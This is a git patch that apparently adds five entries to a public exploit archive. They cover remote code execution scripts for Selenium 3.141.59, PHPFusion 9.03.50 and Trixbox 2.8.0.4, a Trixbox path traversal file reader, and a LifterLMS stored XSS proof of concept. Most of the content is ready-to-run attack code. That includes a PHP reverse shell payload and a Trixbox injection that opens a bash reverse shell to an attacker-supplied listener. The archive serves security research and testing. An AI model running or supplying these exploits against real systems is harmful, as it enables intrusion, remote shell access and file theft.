From 26cc1d3fc35c63a19442de55495b636ff75c6d4f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 29 May 2021 05:01:54 +0000 Subject: [PATCH] DB: 2021-05-29 5 changes to exploits/shellcodes PHPFusion 9.03.50 - Remote Code Execution WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS) Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated) Trixbox 2.8.0.4 - 'lang' Path Traversal Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) --- exploits/linux/webapps/49915.rb | 79 +++++++++++++++++++++++++++++++++ exploits/php/webapps/49911.py | 50 +++++++++++++++++++++ exploits/php/webapps/49912.txt | 26 +++++++++++ exploits/php/webapps/49913.py | 72 ++++++++++++++++++++++++++++++ exploits/php/webapps/49914.py | 75 +++++++++++++++++++++++++++++++ files_exploits.csv | 5 +++ 6 files changed, 307 insertions(+) create mode 100755 exploits/linux/webapps/49915.rb create mode 100755 exploits/php/webapps/49911.py create mode 100644 exploits/php/webapps/49912.txt create mode 100755 exploits/php/webapps/49913.py create mode 100755 exploits/php/webapps/49914.py diff --git a/exploits/linux/webapps/49915.rb b/exploits/linux/webapps/49915.rb new file mode 100755 index 000000000..f0d59da42 --- /dev/null +++ b/exploits/linux/webapps/49915.rb @@ -0,0 +1,79 @@ +# Exploit Title: Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) +# Date: 2021-05-27 +# Exploit Author: Jon Stratton +# Vendor Homepage: https://www.selenium.dev/ +# Software Link: https://selenium-release.storage.googleapis.com/3.141/selenium-server-standalone-3.141.59.jar +# Version: 3.141.59 +# Tested on: Selenium Server 3.141.59, webdriver, geckodriver +# +# https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_rce.rb +# +# When Selenium runs, it creates a custom profile (in /tmp/ for Linux) on the Node. This profile then gets overwritten by a possible overlay that is sent in a base64 encoded zip file when a Selenium session is started. +# +# One of the config file can be used to set a custom handler (which do things like, for instance, associates “mailto:blah@blah.com” to your email client). In this example, a new handler is created for “application/sh” that will execute the argument with “/bin/sh” +# +# Side notes, this profile doesn't safely unzip. So this can be used to write files to the file-system. +# +# The Payload is encoded and embedded as inline data associated with the "application/sh" mime type. + +#!/usr/bin/env ruby + +require 'optparse' +require 'net/http' +require 'json' +require 'uri' +require 'zip' +require 'base64' + +options = {} +OptionParser.new do |opts| + opts.banner = 'Usage: example.rb [options]' + opts.on('-hURL', '--hubURL', 'Selenium Hub URL') do |h| + options[:hub] = h + end + opts.on('--help', 'Prints this help') do + puts opts + exit + end +end.parse! + +hub_url = options[:hub] + +payload = 'rm -rf $0 +echo success > /tmp/selenium_node_rce.txt' + +# Build profile zip file. +stringio = Zip::OutputStream::write_buffer do |io| + # Create a handler for shell scripts + io.put_next_entry("handlers.json") + io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}') +end +stringio.rewind +encoded_profile = Base64.strict_encode64(stringio.sysread) + +# Create session with our new profile +newSession = {:desiredCapabilities => {:browserName => "firefox", :firefox_profile => encoded_profile}} + +uri = URI.parse(hub_url) +http = Net::HTTP.new(uri.host, uri.port) + +# Start session with encoded_profile and save session id for cleanup. +uri = URI.parse("%s/session" % [hub_url]) +request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json') +request.body = JSON.generate(newSession) +response = http.request(request) +sessionId = JSON.parse(response.body)["value"]["sessionId"] + +# URL. +data_url = "data:application/sh;charset=utf-16le;base64,%s" % [Base64.encode64(payload)] +uri = URI.parse("%s/session/%s/url" % [hub_url, sessionId]) +request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json') +request.body = JSON.generate(:url => data_url) +response = http.request(request) + +# End session(not working) +uri = URI.parse("%s/session/%s" % [hub_url, sessionId]) +request = Net::HTTP::Delete.new(uri.request_uri) +http.request(request) + +exit \ No newline at end of file diff --git a/exploits/php/webapps/49911.py b/exploits/php/webapps/49911.py new file mode 100755 index 000000000..0d69e99b8 --- /dev/null +++ b/exploits/php/webapps/49911.py @@ -0,0 +1,50 @@ +# Exploit Title: PHPFusion 9.03.50 - Remote Code Execution +# Date: 20/05/2021 +# Exploit Author: g0ldm45k +# Vendor Homepage: https://www.php-fusion.co.uk/home.php +# Software Link: https://www.php-fusion.co.uk/infusions/downloads/downloads.php?cat_id=30&download_id=606 +# Version: 9.03.50 +# Tested on: Docker + Debian GNU/Linux 8 (jessie) +# CVE : CVE-2020-24949 +# Found by: ThienNV + +import requests +import base64 +import argparse + + +PAYLOAD = "php -r '$sock=fsockopen(\"127.0.0.1\",4444);exec(\"/bin/sh -i <&4 >&4 2>&4\");' " # !!spaces are important in order to avoid ==!! +REQUEST_PAYLOAD = "/infusions/downloads/downloads.php?cat_id=$\{{system(base64_decode({})).exit\}}" + + +parser = argparse.ArgumentParser(description='Send a payload to a Fusion 9.03.50 server with "Allow PHP Execution" enabled.') +parser.add_argument('target', type=str, help='Turn the Allow PHP Execution verification step on or off.') +parser.add_argument("-v", "--no-verify", action="store_false") + +args = parser.parse_args() + +if args.target.startswith("http://") or args.target.startswith("https://"): + target = args.target +else: + print("[!] Target should start with either http:// or https://") + exit() + +# verify payload +PAYLOAD_B64 = base64.b64encode(PAYLOAD.encode('ascii')).decode("ascii") +if '+' in PAYLOAD_B64 or '=' in PAYLOAD_B64: + print("[!] Invalid payload, make sure it does not contain a + or a =!") + exit() + +# verify vulnerable host +if args.no_verify: + page_data = requests.get(target + "/infusions/downloads/downloads.php?cat_id=${system(ls)}") + if "infusion_db.php" not in page_data.text: + print("[!] Can't seem to find infusion_db.php. QUITTING!") + print("[!] If this validation is wrong just use the --no-verify flag.") + exit() + + +# send request +requests.get(target + REQUEST_PAYLOAD.format(PAYLOAD_B64)) + +print("[*] Requests send, did you get what you wanted?") \ No newline at end of file diff --git a/exploits/php/webapps/49912.txt b/exploits/php/webapps/49912.txt new file mode 100644 index 000000000..e7af8bdff --- /dev/null +++ b/exploits/php/webapps/49912.txt @@ -0,0 +1,26 @@ +# Exploit Title: WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS) +# Date: 2021-05-10 +# Exploit Author: Captain_hook +# Vendor Homepage: https://lifterlms.com/ +# Software Link: https://github.com/gocodebox/lifterlms/releases/tag/4.21.0 +# Version: LifterLMS < 4.21.1 +# Tested on: ANY +# CVE : CVE-2021-24308 + +#Summary: + +The 'State' field of the Edit profile page of the LMS by LifterLMS – Online Course, Membership & Learning Management System Plugin for WordPress plugin before 4.21.1 is not properly sanitised when output in the About section of the profile page, leading to a stored Cross-Site Scripting issue. This could allow low privilege users (such as students) to elevate their privilege via an XSS attack when an admin will view their profile. + +#Proof_of_Concept: + +1- As a Lowest Privilege user go to the edit account page of the LMS +(e.g https://example.com/my-courses/edit-account/) + +2- Put Your XSS payload in State parameter and save your edits, such +as "> + +3- The XSS will be stored and triggered in the about section of the profile: (e.g https://example.com/directory/[user_name]/) (Note): The XSS will also be triggered in the admin dashboard when viewing the user details, for example https://example.com/wp-admin/admin.php?page=llms-reporting&tab=students&stab=information&student_id=2 + +Refernces: + +https://github.com/gocodebox/lifterlms/releases/tag/4.21.0 \ No newline at end of file diff --git a/exploits/php/webapps/49913.py b/exploits/php/webapps/49913.py new file mode 100755 index 000000000..c9e26ee21 --- /dev/null +++ b/exploits/php/webapps/49913.py @@ -0,0 +1,72 @@ +# Exploit Title: Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated) +# Date: 27.05.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ +# Credits to: Sachin Wagh +# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/ +# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download +# Version: 2.8.0.4 +# Tested on: Xubuntu 20.04 +# CVE: CVE-2017-14535 + +''' +Description: +trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php +''' + + + +''' +Import required modules: +''' +import requests +import sys +import time + + +''' +User-input: +''' +target_ip = sys.argv[1] +target_port = sys.argv[2] +listen_ip = sys.argv[3] +listen_port = sys.argv[4] + + +''' +Construct malicious request: +''' +# Construct header: +header = { + 'Host': target_ip, + 'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + 'Cache-Control': 'max-age=0' +} + +# Construct malicious link: +link_p1 = 'http://' + target_ip + ':' + target_port + '/maint/modules/home/index.php?lang=english|bash%20-i%20%3E%26%20' +link_p2 = '%2Fdev%2Ftcp%2F' + listen_ip + '%2F' + listen_port + '%200%3E%261||x' +link = link_p1 + link_p2 + + +''' +Finish: EXPLOIT!!! +''' +print('') +print('') +print('Please start the following command in a seperate terminal: nc -lnvp ' + listen_port) +print('') +time.sleep(2) +Ready = input("If you're done and want to start the exploit please input EXPLOIT: ") +if Ready == 'EXPLOIT': + print('') + print('Exploit sent, check your Netcat instance :)') + x = requests.post(link, headers=header) +else: + print('TRY AGAIN') \ No newline at end of file diff --git a/exploits/php/webapps/49914.py b/exploits/php/webapps/49914.py new file mode 100755 index 000000000..3f5a39a84 --- /dev/null +++ b/exploits/php/webapps/49914.py @@ -0,0 +1,75 @@ +# Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal +# Date: 27.05.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ +# Credits to: Sachin Wagh +# Vendor Homepage: https://sourceforge.net/projects/asteriskathome/ +# Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download +# Version: 2.8.0.4 +# Tested on: Xubuntu 20.04 +# CVE: CVE-2017-14537 + +''' +Description: +trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the +lang parameter to /maint/modules/home/index.php. +''' + + +''' +Import required modules: +''' +import requests +import sys +import urllib.parse + + +''' +User-Input: +''' +target_ip = sys.argv[1] +target_port = sys.argv[2] + + +''' +Construct malicious request: +''' +# Constructing header: +header = { + 'Host': target_ip, + 'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Connection': 'keep-alive', + 'Cookie': 'template=classic; lng=en; lng=en', + 'Upgrade-Insecure-Requests': '1', + 'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=', +} + +# Constructing malicious link (payload): +base_link = 'http://' + target_ip + ':' + target_port +base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..' +base_link_addon_3 = '%00english' +print('') +base_link_addon_2 = input('Input the filepath or input EXIT: ') + + + +''' +EXPLOIT: +''' +while base_link_addon_2 != 'EXIT': + base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='') + exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3 + print('') + exploit = requests.post(exploit_link, headers=header) + print('Contents of ' + base_link_addon_2 + ':') + for data in exploit.iter_lines(): + data = data.decode('utf-8') + if data != '': + print(data) + else: + break + print('') + base_link_addon_2 = input('Input the filepath or input EXIT: ') \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b5c6ea524..6e88233c8 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44074,3 +44074,8 @@ id,file,description,date,author,type,platform,port 49907,exploits/multiple/webapps/49907.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)",2021-05-26,"Ron Jost",webapps,multiple, 49909,exploits/php/webapps/49909.py,"Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)",2021-05-26,"Ron Jost",webapps,php, 49910,exploits/multiple/webapps/49910.py,"Postbird 0.8.4 - Javascript Injection",2021-05-27,"Debshubra Chakraborty",webapps,multiple, +49911,exploits/php/webapps/49911.py,"PHPFusion 9.03.50 - Remote Code Execution",2021-05-28,g0ldm45k,webapps,php, +49912,exploits/php/webapps/49912.txt,"WordPress Plugin LifterLMS 4.21.0 - Stored Cross-Site Scripting (XSS)",2021-05-28,Captain_hook,webapps,php, +49913,exploits/php/webapps/49913.py,"Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)",2021-05-28,"Ron Jost",webapps,php, +49914,exploits/php/webapps/49914.py,"Trixbox 2.8.0.4 - 'lang' Path Traversal",2021-05-28,"Ron Jost",webapps,php, +49915,exploits/linux/webapps/49915.rb,"Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)",2021-05-28,"Jon Stratton",webapps,linux,